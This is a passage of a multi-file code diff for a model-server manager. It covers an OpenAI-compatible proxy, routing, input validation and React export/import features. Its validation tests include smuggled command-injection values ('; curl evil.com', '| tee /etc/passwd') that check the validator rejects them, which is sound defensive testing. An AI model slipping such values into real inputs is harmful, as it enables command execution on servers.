// @Summary List instances in OpenAI-compatible format
// @Description Returns a list of instances in a format compatible with OpenAI API
// @Tags OpenAI
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/models [get]
func (h *Handler) OpenAIListInstances() http.HandlerFunc {
	return func(w http.ResponseWriter, _ *http.Request) {
		instances, listErr := h.InstanceManager.ListInstances()
		if listErr != nil {
			writeError(w, http.StatusInternalServerError, "list_failed", "Failed to list instances: "+listErr.Error())
			return
		}

		// Map every instance onto an OpenAI "model" entry. The slice is created
		// non-nil so an empty listing still serializes as [] rather than null.
		models := make([]OpenAIInstance, 0, len(instances))
		for _, inst := range instances {
			models = append(models, OpenAIInstance{
				ID:      inst.Name,
				Object:  "model",
				Created: inst.Created,
				OwnedBy: "llamactl",
			})
		}

		writeJSON(w, http.StatusOK, OpenAIListInstancesResponse{
			Object: "list",
			Data:   models,
		})
	}
}
// OpenAIProxy godoc
// @Summary OpenAI-compatible proxy endpoint
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
// @Tags OpenAI
// @Security ApiKeyAuth
// @Accept json
// @Produces json
// @Success 200 "OpenAI response"
// @Failure 400 {string} string "Invalid request body or instance name"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/ [post]
func (h *Handler) OpenAIProxy() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		// Buffer the full body: it is inspected here for the target instance
		// and replayed to that instance further down.
		rawBody, readErr := io.ReadAll(r.Body)
		if readErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_request", "Failed to read request body")
			return
		}
		r.Body.Close()

		// Decode just enough of the JSON to find the "model" field.
		var payload map[string]any
		if decodeErr := json.Unmarshal(rawBody, &payload); decodeErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
			return
		}

		// A missing or non-string "model" leaves requestedModel empty, so a
		// single emptiness check covers both cases.
		requestedModel, _ := payload["model"].(string)
		if requestedModel == "" {
			writeError(w, http.StatusBadRequest, "invalid_request", "Instance name is required")
			return
		}

		// Validate instance name at the entry point
		instanceName, nameErr := validation.ValidateInstanceName(requestedModel)
		if nameErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
			return
		}

		// The model name doubles as the instance name used for routing.
		inst, lookupErr := h.InstanceManager.GetInstance(instanceName)
		if lookupErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance", lookupErr.Error())
			return
		}

		// Refuse early while the instance is shutting down, before any autostart attempt.
		if inst.GetStatus() == instance.ShuttingDown {
			writeError(w, http.StatusServiceUnavailable, "instance_shutting_down", "Instance is shutting down")
			return
		}

		// Only local instances that are not running yet are started on demand.
		if !(inst.IsRemote() || inst.IsRunning()) {
			if startErr := h.ensureInstanceRunning(inst); startErr != nil {
				writeError(w, http.StatusInternalServerError, "instance_start_failed", startErr.Error())
				return
			}
		}

		// Restore the consumed body so the instance receives the original payload.
		r.Body = io.NopCloser(bytes.NewReader(rawBody))
		r.ContentLength = int64(len(rawBody))

		// Use instance's ServeHTTP which tracks inflight requests and handles shutting down state.
		// On error the response has already been written by ServeHTTP.
		_ = inst.ServeHTTP(w, r)
	}
}

View File

@@ -0,0 +1,22 @@
package server
import (
"fmt"
"net/http"
)
// VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags System
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
	// One labelled line each for version, commit hash and build time.
	const versionFormat = "Version: %s\nCommit: %s\nBuild Time: %s\n"

	return func(w http.ResponseWriter, _ *http.Request) {
		report := fmt.Sprintf(
			versionFormat,
			h.cfg.Version,
			h.cfg.CommitHash,
			h.cfg.BuildTime,
		)
		writeText(w, http.StatusOK, report)
	}
}

View File

@@ -1,13 +0,0 @@
package server
type OpenAIListInstancesResponse struct {
Object string `json:"object"`
Data []OpenAIInstance `json:"data"`
}
type OpenAIInstance struct {
ID string `json:"id"`
Object string `json:"object"`
Created int64 `json:"created"`
OwnedBy string `json:"owned_by"`
}

View File

@@ -1,14 +1,14 @@
package server
import (
"fmt"
"log"
"github.com/go-chi/chi/v5"
"github.com/go-chi/chi/v5/middleware"
"github.com/go-chi/cors"
httpSwagger "github.com/swaggo/http-swagger"
_ "llamactl/apidocs"
_ "llamactl/docs"
"llamactl/webui"
)
@@ -20,7 +20,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
r.Use(cors.Handler(cors.Options{
AllowedOrigins: handler.cfg.Server.AllowedOrigins,
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
AllowedHeaders: handler.cfg.Server.AllowedHeaders,
ExposedHeaders: []string{"Link"},
AllowCredentials: false,
MaxAge: 300,
@@ -60,6 +60,15 @@ func SetupRouter(handler *Handler) *chi.Mux {
})
})
// Node management endpoints
r.Route("/nodes", func(r chi.Router) {
r.Get("/", handler.ListNodes()) // List all nodes
r.Route("/{name}", func(r chi.Router) {
r.Get("/", handler.GetNode())
})
})
// Instance management endpoints
r.Route("/instances", func(r chi.Router) {
r.Get("/", handler.ListInstances()) // List all instances
@@ -77,7 +86,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Llama.cpp server proxy endpoints (proxied to the actual llama.cpp server)
r.Route("/proxy", func(r chi.Router) {
r.HandleFunc("/*", handler.ProxyToInstance()) // Proxy all llama.cpp server requests
r.HandleFunc("/*", handler.InstanceProxy()) // Proxy all llama.cpp server requests
})
})
})
@@ -103,9 +112,54 @@ func SetupRouter(handler *Handler) *chi.Mux {
})
r.Route("/llama-cpp/{name}", func(r chi.Router) {
// Public Routes
// Allow llama-cpp server to serve its own WebUI if it is running.
// Don't auto start the server since it can be accessed without an API key
r.Get("/", handler.LlamaCppUIProxy())
// Private Routes
r.Group(func(r chi.Router) {
if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
}
// This handler auto-starts the server if it's not running
llamaCppHandler := handler.LlamaCppProxy()
// llama.cpp server specific proxy endpoints
r.Get("/props", llamaCppHandler)
// /slots endpoint is secured (see: https://github.com/ggml-org/llama.cpp/pull/15630)
r.Get("/slots", llamaCppHandler)
r.Post("/apply-template", llamaCppHandler)
r.Post("/completion", llamaCppHandler)
r.Post("/detokenize", llamaCppHandler)
r.Post("/embeddings", llamaCppHandler)
r.Post("/infill", llamaCppHandler)
r.Post("/metrics", llamaCppHandler)
r.Post("/props", llamaCppHandler)
r.Post("/reranking", llamaCppHandler)
r.Post("/tokenize", llamaCppHandler)
// OpenAI-compatible proxy endpoint
// Handles all POST requests to /v1/*, including:
// - /v1/completions
// - /v1/chat/completions
// - /v1/embeddings
// - /v1/rerank
// - /v1/reranking
// llamaCppHandler is used here because some users of llama.cpp endpoints depend
// on "model" field being optional, and handler.OpenAIProxy requires it.
r.Post("/v1/*", llamaCppHandler)
})
})
// Serve WebUI files
if err := webui.SetupWebUI(r); err != nil {
fmt.Printf("Failed to set up WebUI: %v\n", err)
log.Printf("Failed to set up WebUI: %v\n", err)
}
return r

View File

@@ -1,5 +1,7 @@
package testutil
import "slices"
// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
return &b
@@ -8,3 +10,23 @@ func BoolPtr(b bool) *bool {
func IntPtr(i int) *int {
return &i
}
// Helper functions for testing command arguments
// Contains reports whether item occurs anywhere in slice.
// A nil or empty slice never contains anything.
func Contains(slice []string, item string) bool {
	// slices.Index yields -1 when the item is absent.
	return slices.Index(slice, item) >= 0
}
// ContainsFlagWithValue reports whether args holds flag immediately followed by value.
// Every occurrence of flag is considered, so a later matching pair is found
// even if an earlier occurrence of flag is followed by a different value.
func ContainsFlagWithValue(args []string, flag, value string) bool {
	// Stop one short of the end: the final argument has no successor to compare against.
	for i := 0; i+1 < len(args); i++ {
		if args[i] == flag && args[i+1] == value {
			return true
		}
	}
	return false
}

View File

@@ -2,8 +2,6 @@ package validation
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"reflect"
"regexp"
)
@@ -24,8 +22,8 @@ var (
type ValidationError error
// validateStringForInjection checks if a string contains dangerous patterns
func validateStringForInjection(value string) error {
// ValidateStringForInjection checks if a string contains dangerous patterns
func ValidateStringForInjection(value string) error {
for _, pattern := range dangerousPatterns {
if pattern.MatchString(value) {
return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
@@ -34,83 +32,8 @@ func validateStringForInjection(value string) error {
return nil
}
// ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
case backends.BackendTypeMlxLm:
return validateMlxOptions(options)
case backends.BackendTypeVllm:
return validateVllmOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
}
return nil
}
// validateMlxOptions validates MLX backend specific options
func validateMlxOptions(options *instance.CreateInstanceOptions) error {
if options.MlxServerOptions == nil {
return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
}
if err := validateStructStrings(options.MlxServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port))
}
return nil
}
// validateVllmOptions validates vLLM backend specific options
func validateVllmOptions(options *instance.CreateInstanceOptions) error {
if options.VllmServerOptions == nil {
return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.VllmServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port))
}
return nil
}
// validateStructStrings recursively validates all string fields in a struct
func validateStructStrings(v any, fieldPath string) error {
// ValidateStructStrings recursively validates all string fields in a struct
func ValidateStructStrings(v any, fieldPath string) error {
val := reflect.ValueOf(v)
if val.Kind() == reflect.Ptr {
val = val.Elem()
@@ -136,21 +59,21 @@ func validateStructStrings(v any, fieldPath string) error {
switch field.Kind() {
case reflect.String:
if err := validateStringForInjection(field.String()); err != nil {
if err := ValidateStringForInjection(field.String()); err != nil {
return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
}
case reflect.Slice:
if field.Type().Elem().Kind() == reflect.String {
for j := 0; j < field.Len(); j++ {
if err := validateStringForInjection(field.Index(j).String()); err != nil {
if err := ValidateStringForInjection(field.Index(j).String()); err != nil {
return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
}
}
}
case reflect.Struct:
if err := validateStructStrings(field.Interface(), fieldName); err != nil {
if err := ValidateStructStrings(field.Interface(), fieldName); err != nil {
return err
}
}

View File

@@ -2,9 +2,6 @@ package validation_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"llamactl/pkg/validation"
"strings"
"testing"
@@ -58,13 +55,11 @@ func TestValidateInstanceName(t *testing.T) {
}
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
err := validation.ValidateInstanceOptions(nil)
var opts backends.Options
err := opts.ValidateInstanceOptions()
if err == nil {
t.Error("Expected error for nil options")
}
if !strings.Contains(err.Error(), "options cannot be nil") {
t.Errorf("Expected 'options cannot be nil' error, got: %v", err)
}
}
func TestValidateInstanceOptions_PortValidation(t *testing.T) {
@@ -83,14 +78,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
options := backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Port: tt.port,
},
}
err := validation.ValidateInstanceOptions(options)
err := options.ValidateInstanceOptions()
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
}
@@ -137,14 +132,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &instance.CreateInstanceOptions{
options := backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Model: tt.value,
},
}
err := validation.ValidateInstanceOptions(options)
err := options.ValidateInstanceOptions()
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
}
@@ -175,14 +170,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &instance.CreateInstanceOptions{
options := backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Lora: tt.array,
},
}
err := validation.ValidateInstanceOptions(options)
err := options.ValidateInstanceOptions()
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
}
@@ -194,14 +189,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
// Test that injection in any field is caught
tests := []struct {
name string
options *instance.CreateInstanceOptions
options backends.Options
wantErr bool
}{
{
name: "injection in model field",
options: &instance.CreateInstanceOptions{
options: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -210,9 +205,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "injection in log file",
options: &instance.CreateInstanceOptions{
options: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -221,9 +216,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "all safe fields",
options: &instance.CreateInstanceOptions{
options: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -237,7 +232,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := validation.ValidateInstanceOptions(tt.options)
err := tt.options.ValidateInstanceOptions()
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
}
@@ -247,12 +242,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
// Test that non-string fields don't interfere with validation
options := &instance.CreateInstanceOptions{
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
options := backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,
@@ -264,7 +256,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
},
}
err := validation.ValidateInstanceOptions(options)
err := options.ValidateInstanceOptions()
if err != nil {
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
}

View File

@@ -43,7 +43,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.1.5",
"vite": "^7.1.11",
"vitest": "^3.2.4"
}
},
@@ -7424,9 +7424,9 @@
}
},
"node_modules/vite": {
"version": "7.1.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.1.5.tgz",
"integrity": "sha512-4cKBO9wR75r0BeIWWWId9XK9Lj6La5X846Zw9dFfzMRw38IlTk2iCcUt6hsyiDRcPidc55ZParFYDXi0nXOeLQ==",
"version": "7.1.11",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.1.11.tgz",
"integrity": "sha512-uzcxnSDVjAopEUjljkWh8EIrg6tlzrjFUfMcR1EVsRDGwf/ccef0qQPRyOrROwhrTDaApueq+ja+KLPlzR/zdg==",
"license": "MIT",
"dependencies": {
"esbuild": "^0.25.0",

View File

@@ -52,7 +52,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.1.5",
"vite": "^7.1.11",
"vitest": "^3.2.4"
}
}

View File

@@ -12,12 +12,14 @@ import { AuthProvider } from '@/contexts/AuthContext'
vi.mock('@/lib/api', () => ({
instancesApi: {
list: vi.fn(),
get: vi.fn(),
create: vi.fn(),
update: vi.fn(),
start: vi.fn(),
stop: vi.fn(),
restart: vi.fn(),
delete: vi.fn(),
getHealth: vi.fn(),
},
serverApi: {
getHelp: vi.fn(),
@@ -30,9 +32,21 @@ vi.mock('@/lib/api', () => ({
vi.mock('@/lib/healthService', () => ({
healthService: {
subscribe: vi.fn(() => () => {}),
checkHealth: vi.fn(),
refreshHealth: vi.fn(() => Promise.resolve()),
checkHealthAfterOperation: vi.fn(),
performHealthCheck: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
},
checkHealth: vi.fn(),
checkHealth: vi.fn(() => Promise.resolve({
state: 'ready',
instanceStatus: 'running',
lastChecked: new Date(),
source: 'http'
})),
}))
function renderApp() {

View File

@@ -12,13 +12,13 @@ interface BackendFormFieldProps {
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
const config = basicBackendFieldsConfig[fieldKey] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
onChange(fieldKey, newValue)
}
const renderField = () => {

View File

@@ -2,7 +2,7 @@
import React from "react";
import { Badge } from "@/components/ui/badge";
import type { HealthStatus } from "@/types/instance";
import { CheckCircle, Loader2, XCircle } from "lucide-react";
import { CheckCircle, Loader2, XCircle, Clock } from "lucide-react";
interface HealthBadgeProps {
health?: HealthStatus;
@@ -10,37 +10,37 @@ interface HealthBadgeProps {
const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
if (!health) {
health = {
status: "unknown", // Default to unknown if not provided
lastChecked: new Date(), // Default to current date
message: undefined, // No message by default
};
return null;
}
const getIcon = () => {
switch (health.status) {
case "ok":
switch (health.state) {
case "ready":
return <CheckCircle className="h-3 w-3" />;
case "loading":
case "starting":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "error":
return <XCircle className="h-3 w-3" />;
case "unknown":
case "restarting":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "shutting_down":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "stopped":
return <Clock className="h-3 w-3" />;
case "failed":
return <XCircle className="h-3 w-3" />;
}
};
const getVariant = () => {
switch (health.status) {
case "ok":
switch (health.state) {
case "ready":
return "default";
case "loading":
case "starting":
return "outline";
case "error":
return "destructive";
case "unknown":
case "restarting":
return "outline";
case "shutting_down":
return "outline";
case "stopped":
return "secondary";
case "failed":
return "destructive";
@@ -48,15 +48,17 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
};
const getText = () => {
switch (health.status) {
case "ok":
switch (health.state) {
case "ready":
return "Ready";
case "loading":
return "Loading";
case "error":
return "Error";
case "unknown":
return "Unknown";
case "starting":
return "Starting";
case "restarting":
return "Restarting";
case "shutting_down":
return "Shutting Down";
case "stopped":
return "Stopped";
case "failed":
return "Failed";
}
@@ -66,10 +68,11 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
<Badge
variant={getVariant()}
className={`flex items-center gap-1.5 ${
health.status === "ok"
health.state === "ready"
? "bg-green-100 text-green-800 border-green-200 dark:bg-green-900 dark:text-green-200 dark:border-green-800"
: ""
}`}
title={health.error || `Source: ${health.source}`}
>
{getIcon()}
<span className="text-xs">{getText()}</span>

View File

@@ -2,12 +2,13 @@
import { Button } from "@/components/ui/button";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import type { Instance } from "@/types/instance";
import { Edit, FileText, Play, Square, Trash2, MoreHorizontal } from "lucide-react";
import { Edit, FileText, Play, Square, Trash2, MoreHorizontal, Download } from "lucide-react";
import LogsDialog from "@/components/LogDialog";
import HealthBadge from "@/components/HealthBadge";
import BackendBadge from "@/components/BackendBadge";
import { useState } from "react";
import { useInstanceHealth } from "@/hooks/useInstanceHealth";
import { instancesApi } from "@/lib/api";
interface InstanceCardProps {
instance: Instance;
@@ -52,6 +53,40 @@ function InstanceCard({
setIsLogsOpen(true);
};
const handleExport = () => {
  // The export runs asynchronously and reports its own failures, so the
  // resulting promise is deliberately not awaited by the click handler.
  const exportInstance = async (): Promise<void> => {
    try {
      // Ask the backend for the current instance data instead of relying on the prop
      const latest = await instancesApi.get(instance.name);

      // docker_enabled is a computed field that is not persisted to disk, so it is left out
      // eslint-disable-next-line @typescript-eslint/no-unused-vars
      const { docker_enabled, ...exportable } = latest;

      // Pretty-print with 2-space indentation (matching backend format)
      const payload = new Blob([JSON.stringify(exportable, null, 2)], { type: "application/json" });
      const objectUrl = URL.createObjectURL(payload);

      // A temporary anchor element drives the browser download
      const anchor = document.createElement("a");
      anchor.href = objectUrl;
      anchor.download = `${instance.name}.json`;

      document.body.appendChild(anchor);
      anchor.click();

      // Remove the anchor and release the object URL once the download was triggered
      document.body.removeChild(anchor);
      URL.revokeObjectURL(objectUrl);
    } catch (error) {
      console.error("Failed to export instance:", error);
      const reason = error instanceof Error ? error.message : "Unknown error";
      alert(`Failed to export instance: ${reason}`);
    }
  };

  void exportInstance();
};
const running = instance.status === "running";
return (
@@ -131,6 +166,18 @@ function InstanceCard({
Logs
</Button>
<Button
size="sm"
variant="outline"
onClick={handleExport}
title="Export instance"
data-testid="export-instance-button"
className="flex-1"
>
<Download className="h-4 w-4 mr-1" />
Export
</Button>
<Button
size="sm"
variant="destructive"

View File

@@ -1,4 +1,4 @@
import React, { useState, useEffect } from "react";
import React, { useState, useEffect, useRef } from "react";
import { Button } from "@/components/ui/button";
import {
Dialog,
@@ -9,9 +9,11 @@ import {
DialogTitle,
} from "@/components/ui/dialog";
import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import type { BackendOptions } from "@/schemas/instanceOptions";
import ParseCommandDialog from "@/components/ParseCommandDialog";
import InstanceSettingsCard from "@/components/instance/InstanceSettingsCard";
import BackendConfigurationCard from "@/components/instance/BackendConfigurationCard";
import { Upload } from "lucide-react";
interface InstanceDialogProps {
open: boolean;
@@ -32,6 +34,7 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
const [formData, setFormData] = useState<CreateInstanceOptions>({});
const [nameError, setNameError] = useState("");
const [showParseDialog, setShowParseDialog] = useState(false);
const fileInputRef = useRef<HTMLInputElement>(null);
// Reset form when dialog opens/closes or when instance changes
@@ -54,31 +57,31 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
}
}, [open, instance]);
const handleFieldChange = (key: keyof CreateInstanceOptions, value: any) => {
const handleFieldChange = (key: keyof CreateInstanceOptions, value: unknown) => {
setFormData((prev) => {
// If backend_type is changing, clear backend_options
if (key === 'backend_type' && prev.backend_type !== value) {
return {
...prev,
[key]: value,
backend_type: value as CreateInstanceOptions['backend_type'],
backend_options: {}, // Clear backend options when backend type changes
};
}
return {
...prev,
[key]: value,
};
} as CreateInstanceOptions;
});
};
const handleBackendFieldChange = (key: string, value: any) => {
const handleBackendFieldChange = (key: string, value: unknown) => {
setFormData((prev) => ({
...prev,
backend_options: {
...prev.backend_options,
[key]: value,
} as any,
} as BackendOptions,
}));
};
@@ -104,11 +107,13 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
}
// Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {};
const cleanOptions: CreateInstanceOptions = {} as CreateInstanceOptions;
Object.entries(formData).forEach(([key, value]) => {
if (key === 'backend_options' && value && typeof value === 'object') {
const typedKey = key as keyof CreateInstanceOptions;
if (key === 'backend_options' && value && typeof value === 'object' && !Array.isArray(value)) {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
const cleanBackendOptions: Record<string, unknown> = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
@@ -118,17 +123,21 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
(cleanOptions as Record<string, unknown>)[typedKey] = cleanBackendOptions as BackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays
} else if (value !== undefined && value !== null) {
// Skip empty strings
if (typeof value === 'string' && value.trim() === "") {
return;
}
// Skip empty arrays
if (Array.isArray(value) && value.length === 0) {
return;
}
(cleanOptions as any)[key] = value;
(cleanOptions as Record<string, unknown>)[typedKey] = value;
}
});
@@ -149,6 +158,49 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setShowParseDialog(false);
};
// Opens the native file picker by forwarding the click to the hidden file input.
const handleImportFile = () => {
  const input = fileInputRef.current;
  if (input) {
    input.click();
  }
};
/**
 * Handles a file chosen through the hidden file input: reads it as text,
 * parses it as JSON and loads its contents into the form.
 *
 * The file must contain an object with a non-empty string `name` and an
 * object `options`. The name is applied only when creating a new instance;
 * the options are merged over the current form data. Invalid or unreadable
 * files are reported with `alert` and leave the form untouched.
 */
const handleFileChange = (event: React.ChangeEvent<HTMLInputElement>) => {
  const input = event.target;
  const file = input.files?.[0];

  // Reset the input up front (the File reference taken above stays usable).
  // Doing it only after a successful import meant that re-selecting the same
  // file after a rejected one produced no `change` event at all.
  input.value = '';

  if (!file) return;

  const reader = new FileReader();

  reader.onload = () => {
    try {
      const content = reader.result as string;
      const parsed: unknown = JSON.parse(content);

      // Validate that it's an instance export. `options` must be a plain
      // object: spreading a string or array into the form state would add
      // bogus numeric keys.
      const candidate =
        typeof parsed === 'object' && parsed !== null && !Array.isArray(parsed)
          ? (parsed as { name?: unknown; options?: unknown })
          : undefined;
      const name = candidate?.name;
      const options = candidate?.options;
      const hasValidName = typeof name === 'string' && name !== '';
      const hasValidOptions =
        typeof options === 'object' && options !== null && !Array.isArray(options);

      if (!hasValidName || !hasValidOptions) {
        alert('Invalid instance file: Missing required fields (name, options)');
        return;
      }

      // Set the instance name (only for new instances, not editing)
      if (!isEditing) {
        handleNameChange(name);
      }

      // Populate all the options from the imported file
      setFormData(prev => ({
        ...prev,
        ...(options as CreateInstanceOptions),
      }));
    } catch (error) {
      console.error('Failed to parse instance file:', error);
      alert(`Failed to parse instance file: ${error instanceof Error ? error.message : 'Invalid JSON'}`);
    }
  };

  // Surface read failures instead of silently doing nothing
  reader.onerror = () => {
    console.error('Failed to read instance file:', reader.error);
    alert(`Failed to read instance file: ${reader.error?.message ?? 'Unknown error'}`);
  };

  reader.readAsText(file);
};
// Save button label logic
let saveButtonLabel = "Create Instance";
@@ -164,14 +216,38 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col">
<DialogHeader>
<DialogTitle>
{isEditing ? "Edit Instance" : "Create New Instance"}
</DialogTitle>
<DialogDescription>
{isEditing
? "Modify the instance configuration below."
: "Configure your new llama-server instance below."}
</DialogDescription>
<div className="flex items-center justify-between">
<div className="flex-1">
<DialogTitle>
{isEditing ? "Edit Instance" : "Create New Instance"}
</DialogTitle>
<DialogDescription>
{isEditing
? "Modify the instance configuration below."
: "Configure your new llama-server instance below."}
</DialogDescription>
</div>
{!isEditing && (
